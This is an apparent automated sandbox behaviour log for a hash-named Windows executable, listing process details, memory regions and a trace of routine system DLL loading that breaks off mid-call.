# Flog Txt Version 1 # Analyzer Version: 4.5.0 # Analyzer Build Date: Apr 22 2022 21:04:16 # Log Creation Date: 05.05.2022 07:40:45.383 Process: id = "1" image_name = "7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" page_root = "0x724ff000" os_pid = "0xcd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x748" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 121 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 122 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 123 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 124 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 125 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 126 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 127 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 128 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 129 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 130 start_va = 0x400000 end_va = 0x43bfff monitored = 1 entry_point = 0x4034f7 region_type = mapped_file name = "7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe") Region: id = 131 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 132 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 134 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 135 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 136 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 275 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 276 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 277 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 278 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 280 start_va = 0x4f0000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 281 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 282 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 284 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 285 start_va = 0x4f0000 end_va = 0x5adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 287 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 288 start_va = 0x76b70000 end_va = 0x76beafff monitored = 0 entry_point = 0x76b8e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 289 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 290 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 291 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 292 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 293 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 294 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 295 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 296 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 297 start_va = 0x741b0000 end_va = 0x755aefff monitored = 0 entry_point = 0x7436b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 298 start_va = 0x75940000 end_va = 0x75976fff monitored = 0 entry_point = 0x75943b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 299 start_va = 0x75f10000 end_va = 0x76408fff monitored = 0 entry_point = 0x76117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 300 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 301 start_va = 0x76ed0000 end_va = 0x76f14fff monitored = 0 entry_point = 0x76eede90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 302 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 303 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 304 start_va = 0x755d0000 end_va = 0x755dbfff monitored = 0 entry_point = 0x755d3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 305 start_va = 0x76cf0000 end_va = 0x76d7cfff monitored = 0 entry_point = 0x76d39b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 306 start_va = 0x766e0000 end_va = 0x76723fff monitored = 0 entry_point = 0x766e7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 307 start_va = 0x77450000 end_va = 0x7745efff monitored = 0 entry_point = 0x77452e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 308 start_va = 0x767c0000 end_va = 0x768aafff monitored = 0 entry_point = 0x767fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 312 start_va = 0x6c760000 end_va = 0x6c7f1fff monitored = 0 entry_point = 0x6c76dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 313 start_va = 0x480000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 314 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 315 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 316 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 317 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 318 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 319 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 320 start_va = 0xb60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 321 start_va = 0x1f60000 end_va = 0x1ff0fff monitored = 0 entry_point = 0x1f98cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 322 start_va = 0x1f60000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 323 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 324 start_va = 0x2040000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 325 start_va = 0x70220000 end_va = 0x70238fff monitored = 0 entry_point = 0x702247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 326 start_va = 0x75980000 end_va = 0x75d8afff monitored = 0 entry_point = 0x759aadf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 327 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 328 start_va = 0x72120000 end_va = 0x7226afff monitored = 0 entry_point = 0x72181660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 329 start_va = 0x76bf0000 end_va = 0x76c81fff monitored = 0 entry_point = 0x76c28cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 330 start_va = 0x6fa80000 end_va = 0x6fa9cfff monitored = 0 entry_point = 0x6fa83b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 331 start_va = 0x6c680000 end_va = 0x6c6d3fff monitored = 0 entry_point = 0x6c69dc50 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 332 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 333 start_va = 0x76730000 end_va = 0x767b3fff monitored = 0 entry_point = 0x76756220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 334 start_va = 0x701d0000 end_va = 0x701f7fff monitored = 0 entry_point = 0x701d7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 335 start_va = 0x6cef0000 end_va = 0x6cef7fff monitored = 0 entry_point = 0x6cef17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 336 start_va = 0x6c670000 end_va = 0x6c675fff monitored = 0 entry_point = 0x6c671570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 337 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 338 start_va = 0x2240000 end_va = 0x2576fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 339 start_va = 0x480000 end_va = 0x483fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 340 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 341 start_va = 0x490000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 342 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 343 start_va = 0x2230000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 344 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 345 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 346 start_va = 0x5d0000 end_va = 0x5d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 347 start_va = 0x5e0000 end_va = 0x5f6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 348 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 349 start_va = 0x1f60000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 350 start_va = 0x2030000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 351 start_va = 0x2580000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 352 start_va = 0x2680000 end_va = 0x2e8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 353 start_va = 0x6c5e0000 end_va = 0x6c660fff monitored = 0 entry_point = 0x6c5e6310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 354 start_va = 0x6c5c0000 end_va = 0x6c5d5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 355 start_va = 0x6c580000 end_va = 0x6c5b0fff monitored = 0 entry_point = 0x6c5922d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 356 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 357 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 358 start_va = 0x2140000 end_va = 0x21fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 359 start_va = 0x5d0000 end_va = 0x5d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 360 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 361 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 362 start_va = 0x630000 end_va = 0x634fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 363 start_va = 0x2680000 end_va = 0x2e88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 364 start_va = 0x2680000 end_va = 0x2e86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 365 start_va = 0x2680000 end_va = 0x2e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 366 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0xacc [0131.830] SetErrorMode (uMode=0x8001) returned 0x0 [0131.849] GetVersionExW (in: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0131.850] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76410000 [0131.850] GetProcAddress (hModule=0x76410000, lpProcName="SetDefaultDllDirectories") returned 0x773a6270 [0131.850] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0131.850] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.850] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0131.854] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x70240000 [0132.465] lstrlenA (lpString="UXTHEME") returned 7 [0132.465] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.465] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\USERENV.dll") returned 12 [0132.465] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x70220000 [0132.825] lstrlenA (lpString="USERENV") returned 7 [0132.825] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.825] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0132.825] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x75980000 [0133.509] lstrlenA (lpString="SETUPAPI") returned 8 [0133.509] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.510] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\APPHELP.dll") returned 12 [0133.510] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x740e0000 [0133.858] lstrlenA (lpString="APPHELP") returned 7 [0133.858] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.858] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0133.858] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x72120000 [0134.328] lstrlenA (lpString="PROPSYS") returned 7 [0134.328] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0134.328] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0134.328] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x6fa80000 [0134.571] lstrlenA (lpString="DWMAPI") returned 6 [0134.571] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0134.571] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0134.571] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x74180000 [0134.571] lstrlenA (lpString="CRYPTBASE") returned 9 [0134.572] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0134.572] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\OLEACC.dll") returned 11 [0134.572] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x6c680000 [0134.958] lstrlenA (lpString="OLEACC") returned 6 [0134.958] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0134.958] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0134.959] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x76730000 [0135.285] lstrlenA (lpString="CLBCATQ") returned 7 [0135.285] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.285] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\NTMARTA.dll") returned 12 [0135.285] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\NTMARTA.dll", hFile=0x0, dwFlags=0x8) returned 0x701d0000 [0135.559] lstrlenA (lpString="NTMARTA") returned 7 [0135.559] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0135.559] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.559] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\VERSION.dll") returned 12 [0135.559] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x6cef0000 [0135.739] GetProcAddress (hModule=0x6cef0000, lpProcName="GetFileVersionInfoW") returned 0x6cef1570 [0135.739] 